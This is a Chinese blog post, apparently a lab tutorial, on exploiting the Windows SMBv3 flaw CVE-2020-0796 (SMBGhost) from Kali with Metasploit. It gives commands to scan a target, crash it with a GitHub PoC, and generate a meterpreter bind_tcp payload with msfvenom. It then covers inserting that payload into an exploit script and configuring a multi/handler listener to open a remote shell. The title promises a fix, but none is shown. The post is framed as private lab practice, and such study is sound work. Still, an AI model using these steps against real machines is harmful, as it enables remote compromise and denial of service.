msf教学CVE-2020-0796攻击及修复

声明:本内容非真实商用网站,均为个人手工自行搭建的虚拟网站,仅为个人练习,无任何商业获利或者侵权行为。使用内容均为开源软件。

前提条件:vm虚拟kali系统,win10系统1903版本关闭防火墙

github下载扫描文件scanner.py:

 用下载好的文件检测目标主机是否有漏洞: python3 扫描文件 目标主机

 github下载攻击CVE-2020-0796.py 

 下载文件放到kali系统 

 

cd进入到刚才保存的目录,用python3 CVE-2020-0796.py 主机地址,进行poc攻击。

宿主机会蓝屏

漏洞利用,生成一个bind_tcp正向连接

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

 github下载漏洞利用脚本

 把刚才复制的一堆文件整理下格式,替换到exploit.py里面,保存

 整理好的文件放到攻击机里面

命令行打开这目录,exploit.py就是刚才替换内容的文件

 另外开一个kali连接,用mf启动监听器

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 4444 //监听端口
set rhost 192.168.000.000  //目标主机
run

 回到刚才的会话,用exploit进行攻击

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值